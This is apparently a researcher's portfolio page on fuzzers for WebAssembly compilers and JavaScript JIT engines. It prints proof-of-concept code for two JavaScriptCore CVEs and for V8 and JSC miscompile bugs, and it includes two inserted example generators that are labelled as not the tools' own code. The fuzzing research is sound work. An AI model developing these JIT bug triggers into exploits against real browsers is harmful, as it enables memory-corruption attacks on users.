PROJECTS

WasmCFuzz: Structure-aware Fuzzing for Wasm Compilers

Recently, I’ve turned my attention to WebAssembly, which I think has a lot of potential and is now supported by all major browsers. I have implemented a generation-based fuzzer, built around the file structure of Wasm binaries, to fuzz the WebAssembly compilers of browsers.

My tool has found 9 and 3 WebAssembly-related bugs in JavaScriptCore and SpiderMonkey, respectively.
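To illustrate what "generation based on the file structure of the Wasm binary" means, here is an added example (it is not WasmCFuzz's code and makes no claim about its design). It assembles complete modules section by section, keeps the operand stack consistent while emitting the function body so every module validates, computes a reference result during generation, and contrasts this with blind bit-flipping, where most mutants are rejected by the decoder before the compiler ever sees them. It assumes Node.js with the built-in WebAssembly API; the PRNG, the seed values and the single-export module layout are choices of this example.

```javascript
// Added example, not WasmCFuzz's own code: a minimal structure-aware
// generator for Wasm binaries. Assumes Node.js with the built-in
// WebAssembly API; no engine flags or packages are needed.

// Unsigned LEB128: the variable-length integer used for every size
// and count field in the binary format.
function uleb128(n) {
  const out = [];
  do {
    let byte = n & 0x7f;
    n >>>= 7;
    if (n !== 0) byte |= 0x80;
    out.push(byte);
  } while (n !== 0);
  return out;
}

// Signed LEB128, used for i32.const immediates.
function sleb128(n) {
  const out = [];
  for (;;) {
    const byte = n & 0x7f;
    n >>= 7;
    const signBit = (byte & 0x40) !== 0;
    if ((n === 0 && !signBit) || (n === -1 && signBit)) {
      out.push(byte);
      return out;
    }
    out.push(byte | 0x80);
  }
}

// A section is: one id byte, the payload size as uleb128, the payload.
function section(id, payload) {
  return [id, ...uleb128(payload.length), ...payload];
}

// xorshift32 PRNG (constructed here) so that a seed reproduces a module.
function makeRng(seed) {
  let s = seed >>> 0 || 1;
  return () => {
    s ^= s << 13; s >>>= 0;
    s ^= s >>> 17;
    s ^= s << 5; s >>>= 0;
    return s;
  };
}

const OPS = [0x6a, 0x6b, 0x6c]; // i32.add, i32.sub, i32.mul

// Straight-line i32 body. The operand stack is tracked while emitting,
// so the body always type-checks: push an i32.const, or, with two
// operands available, pop them with a binary op. The same walk yields
// the reference result with 32-bit wrap-around.
function genBody(rng, steps) {
  const code = [], stack = [];
  for (let i = 0; i < steps; i++) {
    if (stack.length >= 2 && rng() % 2 === 0) {
      const op = OPS[rng() % OPS.length];
      const b = stack.pop(), a = stack.pop();
      if (op === 0x6a) stack.push((a + b) | 0);
      else if (op === 0x6b) stack.push((a - b) | 0);
      else stack.push(Math.imul(a, b));
      code.push(op);
    } else {
      const v = rng() | 0; // full int32 range, negatives included
      stack.push(v);
      code.push(0x41, ...sleb128(v)); // i32.const v
    }
  }
  while (stack.length > 1) { // fold leftovers so exactly one i32 remains
    const b = stack.pop(), a = stack.pop();
    stack.push((a + b) | 0);
    code.push(0x6a);
  }
  code.push(0x0b); // end
  return { code, expected: stack[0] };
}

// Whole module: magic, version, then type/function/export/code sections
// in the order the format requires.
function genModule(seed, steps = 8) {
  const { code, expected } = genBody(makeRng(seed), steps);
  const body = [0, ...code]; // zero local declarations, then the code
  const bytes = Uint8Array.from([
    0x00, 0x61, 0x73, 0x6d, 0x01, 0x00, 0x00, 0x00, // "\0asm", version 1
    ...section(1, [1, 0x60, 0, 1, 0x7f]),          // type 0: () -> i32
    ...section(3, [1, 0]),                         // func 0 has type 0
    ...section(7, [1, 1, 0x66, 0x00, 0]),          // export "f" = func 0
    ...section(10, [1, ...uleb128(body.length), ...body]),
  ]);
  return { bytes, expected };
}

// Compile and run a generated module in the host engine.
function runModule(m) {
  const inst = new WebAssembly.Instance(new WebAssembly.Module(m.bytes), {});
  return inst.exports.f();
}

// Every generated module should validate and agree with the reference.
function checkSeeds(count) {
  let valid = 0, agree = 0;
  for (let seed = 1; seed <= count; seed++) {
    const m = genModule(seed);
    if (WebAssembly.validate(m.bytes)) valid++;
    if (runModule(m) === m.expected) agree++;
  }
  return { valid, agree };
}

// Contrast: flip one bit of a valid module and count how many mutants
// still validate; the rest never reach the compiler.
function bitFlipValidRate(seed, trials) {
  const rng = makeRng(seed), base = genModule(seed).bytes;
  let valid = 0;
  for (let t = 0; t < trials; t++) {
    const mutant = Uint8Array.from(base);
    mutant[rng() % mutant.length] ^= 1 << (rng() % 8);
    if (WebAssembly.validate(mutant)) valid++;
  }
  return valid / trials;
}

console.log(checkSeeds(100), 'bit-flip validity rate:', bitFlipValidRate(1, 200));
```

The generator only covers one opcode family, but the shape is the point: sizes and counts are derived from what was emitted rather than guessed, so the output lands in the compiler instead of the decoder's error path.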

Figure: The workflow of WasmCFuzz.

PatchFuzz: Patch Fuzzing for JavaScript Engines

PatchFuzz: I am a major contributor to this project, and the code will be available to the public after the paper has been accepted.

Figure: The workflow of PatchFuzz.

Here are two bugs to share. The two proofs of concept differ only in the mask applied to n (0xffffffff versus 0xffffffff-1); both warm the function up for a million calls and only pass the edge value -2147483648 (INT32_MIN) on the last iteration.

CVE-2020-9983
    const ITERATIONS=1000000;
    function f(n){
        n&=0xffffffff;                 // force n to an int32
        if(n<-1){
            let v=(-n)&0xffffffff;
            let i=Math.abs(n);         // Math.abs(INT32_MIN) does not fit in an int32
            let arr=new Array(10);
            arr.fill(42.42);
            if(i<arr.length){
                return arr[i];
            }
        }
    }
    for(let i=0;i<ITERATIONS;i++){
        let isLastIteration=i==ITERATIONS-1;
        let n=-(i%10);                 // small negative values during warm-up
        if(isLastIteration){
            n=-2147483648;             // INT32_MIN only on the final, JIT-compiled call
        }
        f(n);
    }

CVE-2020-9802
    const ITERATIONS=1000000;
    function f(n){
        n&=0xffffffff-1;               // same as above, but masks with 0xfffffffe
        if(n<-1){
            let v=(-n)&0xffffffff;
            let i=Math.abs(n);
            let arr=new Array(10);
            arr.fill(42.42);
            if(i<arr.length){
                return arr[i];
            }
        }
    }
    for(let i=0;i<ITERATIONS;i++){
        let isLastIteration=i==ITERATIONS-1;
        let n=-(i%10);
        if(isLastIteration){
            n=-2147483648;
        }
        f(n);
    }

FuzzJIT: Oracle-Enhanced Fuzzing for JavaScript Engine JIT Compiler

FuzzJIT: It is a fuzzing tool for JavaScript engine JIT compilers, built on top of Fuzzilli. I was the only student involved in this project. The main contributors to this work are my mentor and zhiyi. I was responsible for the calculation of some evaluative metrics, such as code coverage. I also used FuzzJIT to find several interesting logic bugs.

Figure: The workflow of FuzzJIT.

Here are two bugs to share:

  1. v8_unsigned_number_optimization (I forgot to submit it.)
    // Run in d8 with --allow-natives-syntax so that %OptimizeFunctionOnNextCall is accepted.
    function opt(){
        var a=new Float32Array(3300000000);
        a[-1000000000]=666;        // a negative index is not a valid typed-array index
        var b=a[-1000000000];
        var c=a[3294967296];       // -1000000000 reinterpreted as unsigned 32-bit is 3294967296
        for(let i=1;i<1000;i++){
        }
        return c;
    }
    opt();
    print(opt()); // output: 0
    %OptimizeFunctionOnNextCall(opt);
    print(opt()); // output: 666   (the optimized code treats the negative index as unsigned)

  2. jsc_issue_228068
    function opt() {
        return parseInt("-0");     // must return -0, not +0
    }
    let r1 = opt();
    print(Object.is(r1, -0)); // output: true
    for (let i = 0; i < 1000; i++) {
        opt();                 // warm up so the JIT compiles opt
    }
    let r2 = opt();
    print(Object.is(r2, -0)); // output: false   (the JIT-compiled version returns +0)
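The PoCs above (the two WebKit CVEs under PatchFuzz and the two FuzzJIT bugs) all follow one pattern: call a function cold, warm it up until the JIT compiles it, and compare. The following is an added example that packages that pattern as a reusable consistency oracle; it is not FuzzJIT's or PatchFuzz's code, and the function names (checkJitConsistency, makeFlakyNegZero) are this example's own. It compares with Object.is so that a -0/+0 divergence like the parseInt bug is caught, which a plain === check would miss, and includes a constructed counter-driven stand-in for a miscompile so the reporting path can be exercised on an engine where the real bugs are fixed. Assumes Node.js; no engine flags are needed.

```javascript
// Added example, not FuzzJIT's or PatchFuzz's code: a JIT consistency
// oracle in the style of the PoCs above. Assumes Node.js.

// Record each input's result while the function is cold, warm the
// function up so a tiering JIT compiles it, then re-run every input and
// compare. Object.is distinguishes +0 from -0 and NaN from NaN, which
// === does not; the parseInt("-0") bug above is exactly such a case.
function checkJitConsistency(fn, inputs, warmup = 100000) {
  const cold = inputs.map(args => fn(...args));
  for (let i = 0; i < warmup; i++) {
    fn(...inputs[i % inputs.length]);
  }
  const mismatches = [];
  inputs.forEach((args, k) => {
    const hot = fn(...args);
    if (!Object.is(cold[k], hot)) {
      mismatches.push({ args, cold: cold[k], hot });
    }
  });
  return { consistent: mismatches.length === 0, mismatches };
}

// Constructed stand-in for a miscompile (no real JIT involved): behaves
// like the JSC bug above, returning -0 while "cold" and +0 once "hot",
// driven by a call counter so the oracle's detection path can be shown
// on any engine.
function makeFlakyNegZero() {
  let calls = 0;
  return () => (++calls > 1000 ? 0 : -0);
}

// The real case from the JSC report, on the host engine.
console.log('parseInt:', checkJitConsistency(s => parseInt(s), [['-0'], ['0'], ['42']]));
// The stand-in: reported as inconsistent, with cold/hot values shown.
console.log('stand-in:', checkJitConsistency(makeFlakyNegZero(), [[]]));
```

Results worth keeping are the cold/hot pairs and the argument list, since a mismatch is only actionable once it can be replayed as a standalone PoC like the ones above.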